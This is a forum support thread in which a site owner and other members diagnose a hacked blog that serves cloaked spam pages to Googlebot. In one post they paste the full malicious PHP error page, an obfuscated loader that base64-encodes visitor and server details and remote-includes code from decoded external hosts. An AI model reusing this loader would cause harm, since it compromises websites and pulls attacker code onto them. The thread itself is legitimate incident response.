Hi again, it's been a while and nobody's given any indication of whether this problem is unique or common.

I'm still seeing this, sometimes 1000s of URLs in a single day and I'd like to find out what's causing it.

Anyone out there have any thoughts?
Thanks,
Jade

What is the exact line you find in the logs (please one example, not all of them B)

I can *show* you what it is, using firefox and a simple addon.

Go here: https://addons.mozilla.org/en-US/firefox/addon/59

Install the user agent switcher.

Set it up so that you can spoof Google. The info you need specifically is this:

useragent: google

the rest of the lines: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

Once youve done that, spoof your user agent and take a look at THIS page:

http://yoga-teacher-training.org/blog/skins/bluesky/download-full-version-soldier-of-fortune-2-free.html
its here as well:

http://yoga-teacher-training.org/blog/skins/bluesky/index.php

What you will see, is what Googlebot will see, and it sees what it thinks it sees, in other words, it's there, virtually, if not physically.

--

The specific cause? No telling, without looking further at your files, but you can be assured your site has been exploited.

PS: You can see a rough unformatted version of the same thing at this url (continuing to spoof Googlebot):

http://yoga-teacher-training.org/blog/skins/bluesky/

---

I CAN tell you that thats one of the more trickier hacks/exploits on the web -- providing spam content to Google while preventing the average Joe from seeing it. See how long it worked for you? :(

First thing I would be doing is going through my files, ALL of them, you might start by looking at files that werent specifically upgraded the last time you did one. Skin files(!!??).. Look for ANY odd javascript, anything that looks encoded, anything that looks out of place, anything. Look for files that have odd timestamps (everytime a file is edited an updated timestamp is applied to it) -- if all files in one directory have one timestamp and another doesnt, but instead has a more recent one, look LONG and hard at that file.

You also want to check your permissions while you are at it. chmodding 777 is the most common downfall for ppl. Dont use it, unless you absolutely have no choice.

I would help you further look through the files, but I'm way too frazzled.

If you just want to try to wipe the slate clean you can do that also..

DELETE and then reupload FRESH copies of ANY and ALL files that were not replaced during your last upgrade.

--

If this wasnt an upgrade, the same suggestions apply.

and for future reference, please post the url to your blog when asking these types of questions. (Note to all)

I'm smart and dont mind going out of my way to find things.. but you might have gotten an answer sooner from someone else had they just been provided the info.

PS: snippits of log files are not necessary

------

On a side note, it's useful for ppl to check their sites occasionally -- to "see" just what Googlebot" sees.

Afwas wrote:

What is the exact line you find in the logs (please one example, not all of them B)

Thanks for the interest. Here's a line:

[Mon Nov 26 07:34:41 2007] [error] [client 66.249.70.85] File does not exist: /home/**removed-for-security-reasons**/public_html/ytt/blog/skins/bluesky/seeed-ding-mp3-download.html

Ive already told you what to do to start.. please read before responding further.

whoo wrote:

I can *show* you what it is, using firefox and a simple addon.

whoo wrote:

The specific cause? No telling, without looking further at your files, but you can be assured your site has been exploited.

I CAN tell you that thats one of the more trickier hacks/exploits on the web -- providing spam content to Google while preventing the average Joe from seeing it. See how long it worked for you? :(

Thanks whoo. I really appreciate the suggestion. I've used a lot of Firefox extensions before, but never this one. This one is great and it's helped me to realize that the problem is ongoing.

Since my error logs were showing googlebot requesting non-existent pages and getting not-found errors, I assumed that googlebot wasn't continuing to see these spammy pages.

But with this extension, I see that Google is still being fed the content.

So, with your suggestions and with other thoughts that occur to me now that I understand this better I will dig in more deeply and see if I can put an end to this.

Thanks so much for your help. I'll respond later with any results I achieve.

And by the way, I apologize for not posting the blog URL right away. I held it back for a couple of reasons. First, I thought the pages did not exist, so there was nothing to be seen. Second, I thought it might be discouraged since some forums have people posting purely to gain incoming links. Lastly, since I didn't know the cause of the problem, I didn't want to advertise the URL in case the description of the problem might indicate our vulnerability and along with the URL it might expose us to even more exploits.

But I take your point and appreciate your willingness to help anyway.

Regards,
Jade

whoo wrote:

Ive already told you what to do to start.. please read before responding further.

Hi whoo, I was responding to posts in order. Thanks.

jade,

No worries ..good luck

Hi again,

I've been looking at everything and the likely culprit seems to be the error page (as specified in the .htaccess). It's got the filename: 236731.php and contains the following code:

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);} ?>

Does anyone see anything suspicious here?

I made a copy of this and then edited it to echo the words "Page Not Found" and uploaded it. Now the google user agent in firefox receives that echoed text when visiting the spammy links instead of the spam pages.

I think it might be the else/if statements in the error page. Am I right?

Jade

dont worry over picking out exactly what inside the file is the problem -- the file IS the problem.

Make sure that your .htaccess is NOT world writable. HUGE mistake if thats the case. 644 == optimal

Change whatever is inside your .htaccess that is redirecting to that, delete that file, or save it for posterity, forward it to your host, etc..

whoo wrote:

dont worry over picking out exactly what inside the file is the problem -- the file IS the problem.

Make sure that your .htaccess is NOT world writable. HUGE mistake if thats the case. 644 == optimal

Change whatever is inside your .htaccess that is redirecting to that, delete that file, or save it for posterity, forward it to your host, etc..

Thanks for the confirmation. I've made the necessary changes. The .htaccess file was 755, which I would never do myself.

The obsessive compulsive part of myself would like to dig into it more to see if I could uncover its source and purpose (since none of the links on the spammy pages seemed to point to external links).

But I may never know. I inherited this blog installation when I took over a client's site and then noticed this problem only after moving their site to a new host a few months ago (the new host has better error reporting).

Anyway, I'm glad to have solved it. So, thanks again for your excellent help.

Jade

jadeb wrote:

The obsessive compulsive part of myself would like to dig into it more to see if I could uncover its source and purpose (since none of the links on the spammy pages seemed to point to external links).

if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){}
else {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);} ?>

==

http://www3.rssnews.ws/ & http://www3.xmldata.info/

Just in case you fancy whois and reporting to hosts ;)

¥

¥åßßå wrote:

http://www3.rssnews.ws/ & http://www3.xmldata.info/

Just in case you fancy whois and reporting to hosts ;)

¥

Thanks for this. I assume you got these by decoding the strings.

Both of those URLs show no website available and the whois lookups show private registrations, so I'm not sure how to really complain in any useful way.

But hopefully this will be a warning for other members here. I found another one of these phony error pages in the skins/ folder, so I think it's possible that this was brought into the site through a skin. There could be a lot of other people out there suffering the same exploit who just haven't noticed it in their error logs.

There's also the possibility that this didn't come through evo but other software on the server ( not even in your folder, just any other account ) .... it's one of the joys of shared hosting.

¥

btw. the "no website", that's how I'd do it if I was a hacker, you don't need to "reply" to log an open victim ;)
The whois on the other hand will tell you the nameservers, and you can ping the site to narrow the ip